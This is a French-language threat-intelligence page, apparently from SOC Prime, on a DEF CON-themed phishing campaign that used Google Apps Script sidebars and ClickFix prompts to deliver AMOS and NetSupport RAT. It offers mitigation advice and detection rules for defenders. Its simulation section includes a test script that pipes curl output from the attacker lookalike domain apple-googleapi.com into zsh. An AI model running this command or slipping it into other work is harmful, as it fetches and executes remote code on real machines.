SOC Prime Bias: High

21 Aug 2026 16:11 UTC

Informaticiens en Sécurité : Comment le Phishing Thématique DEF CON Exploite Google Apps Script pour Distribuer des Logiciels Malveillants

Author Photo
SOC Prime Team linkedin icon Suivre
Informaticiens en Sécurité : Comment le Phishing Thématique DEF CON Exploite Google Apps Script pour Distribuer des Logiciels Malveillants
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Résumé

Les acteurs de la menace ciblent les participants aux conférences de cybersécurité par le biais de l’ingénierie sociale sur X, anciennement Twitter, pour distribuer des logiciels malveillants en utilisant des Google Docs armés et des installateurs DocSend frauduleux. La campagne livre à les utilisateurs de macOS un logiciel espion AMOS, tandis que les victimes sur Windows reçoivent une charge utile à plusieurs étapes impliquant NetSupport RAT et un implant de portefeuille Ledger. L’attaque abuse des barres latérales de Google Apps Script et des invites de type ClickFix pour réduire la suspicion et déclencher l’exécution de code malveillant.

Enquête

Les chercheurs d’Huntress ont interagi avec l’acteur de la menace en se faisant passer pour un dirigeant de CoinDesk pour observer la chaîne d’attaque complète. L’enquête a révélé un processus sophistiqué en plusieurs étapes impliquant Google Apps Script, de faux installateurs signés avec des certificats volés et un proxy local interceptant TLS sur Windows. Les chercheurs ont également identifié une étape secondaire qui exécute JavaScript en mémoire et déploie une autorité de certification frauduleuse.

Atténuation

Les utilisateurs devraient traiter les demandes inattendues d’exécuter des commandes terminales, de contourner Gatekeeper ou d’installer manuellement des mises à jour à partir des barres latérales de documents comme suspectes. Les organisations devraient surveiller les activités inhabituelles de Google Apps Script et l’utilisation non autorisée de certificats de signature de code. Des contrôles stricts sur les terminaux et une vérification indépendante des liens de partage de documents peuvent réduire davantage l’exposition.

Réponse

Si une activité malveillante est détectée, le système affecté devrait être isolé immédiatement pour arrêter l’exfiltration de données ou le mouvement latéral. Les intervenants devraient préserver les preuves médico-légales et envisager de ré-imager l’appareil tout en traitant les identifiants locaux et les données des portefeuilles de cryptomonnaie comme compromis. Les sessions actives devraient être révoquées, les mots de passe réinitialisés et toutes les clés API ou secrets stockés sur le système devraient être tournés.

Flux d’attaque

Nous mettons encore à jour cette partie.

Détections

Commande et contrôle suspect par requête DNS de domaine de premier niveau inhabituel (TLD) (via dns)

Équipe SOC Prime
21 août 2026

Tentative d’exécution de Curl suspect [MacOS] (via cmdline)

Équipe SOC Prime
20 août 2026

Exécution possible par utilisation d’un nom de script court (via cmdline)

Équipe SOC Prime
20 août 2026

Appel de méthodes .NET suspectes à partir de Powershell (via powershell)

Équipe SOC Prime
20 août 2026

IOCs (HashSha256) à détecter : Post-DEF CON Phishing utilise Google Doc Apps Script pour livrer des logiciels malveillants

Règles SOC Prime AI
20 août 2026

IOCs (HashMd5) à détecter : Post-DEF CON Phishing utilise Google Doc Apps Script pour livrer des logiciels malveillants

Règles SOC Prime AI
20 août 2026

IOCs (SourceIP) à détecter : Post-DEF CON Phishing utilise Google Doc Apps Script pour livrer des logiciels malveillants

Règles SOC Prime AI
20 août 2026

IOCs (DestinationIP) à détecter : Post-DEF CON Phishing utilise Google Doc Apps Script pour livrer des logiciels malveillants

Règles SOC Prime AI
20 août 2026

Détection du déploiement de DocSend trojanisé et NetSupport RAT [Création de processus Windows]

Règles SOC Prime AI
20 août 2026

Exécution potentielle de script shell malveillant sur macOS [Création de processus Linux]

Règles SOC Prime AI
20 août 2026

Détection de communication malveillante et de livraison de charge utile [Connection réseau Windows]

Règles SOC Prime AI
20 août 2026

Détecter la création et l’exécution de scripts PowerShell malveillants [Windows Powershell]

Règles SOC Prime AI
20 août 2026

## Exécution de simulation

Condition préalable : le contrôle de pré-vol de télémétrie et de ligne de base doit avoir réussi.

Raisonnement : cette section détaille l’exécution précise de la technique de l’adversaire (TTP) destinée à déclencher la règle de détection. Les commandes et le récit doivent refléter directement les TTP identifiés et viser à générer la télémétrie exacte attendue par la logique de détection. Des exemples abstraits ou non liés entraîneront un mauvais diagnostic.

  • Récit d’attaque et commandes : L’adversaire vise à obtenir un accès initial sur une station de travail macOS en se faisant passer pour un processus de mise à jour légitime de Google API. Ils utilisent une tactique d’ingénierie sociale où l’utilisateur est invité à exécuter une commande dans le Terminal. La commande utilise curl pour récupérer une charge utile depuis apple-googleapi.com (un domaine typographique/se ressemblant) et achemine la sortie directement dans zsh. Cette approche « vivre de la terre » tente de minimiser l’empreinte médico-légale sur le système de fichiers en exécutant le code directement depuis le flux réseau.

  • Script de test de régression :

    #!/bin/bash
    # Script de simulation pour déclencher la règle d'"Exécution potentielle de script shell malveillant". 
    # Remarque : Nous utilisons une URL factice qui imite la structure du domaine pour éviter les appels externes réels si souhaité,
    # mais pour que la règle fonctionne, la ligne de commande DOIT contenir 'apple-googleapi.com'.
    
    echo "[*] Début de la simulation : Mimique de tuyau de shell malveillant..."
    
    # Cette commande satisfait toutes les conditions : 
    # 1. Le processus est zsh/sh/bash 
    # 2. Contient 'curl' 
    # 3. Contient '| zsh' 
    # 4. Contient 'apple-googleapi.com'
    
    # Nous utilisons une URL inexistante pour empêcher l'exécution réelle de la charge utile tout en générant toujours la télémétrie.
    curl -s http://apple-googleapi.com/update.sh | zsh
    
    echo "[*] Commande de simulation envoyée."
  • Commandes de nettoyage :

    # Aucun fichier n'est créé sur le disque par la commande d'attaque elle-même,
    # mais si des artefacts ont été générés, ils devraient être supprimés.
    rm -f ~/Downloads/update.sh 2>/dev/null
    echo "[*] Nettoyage terminé."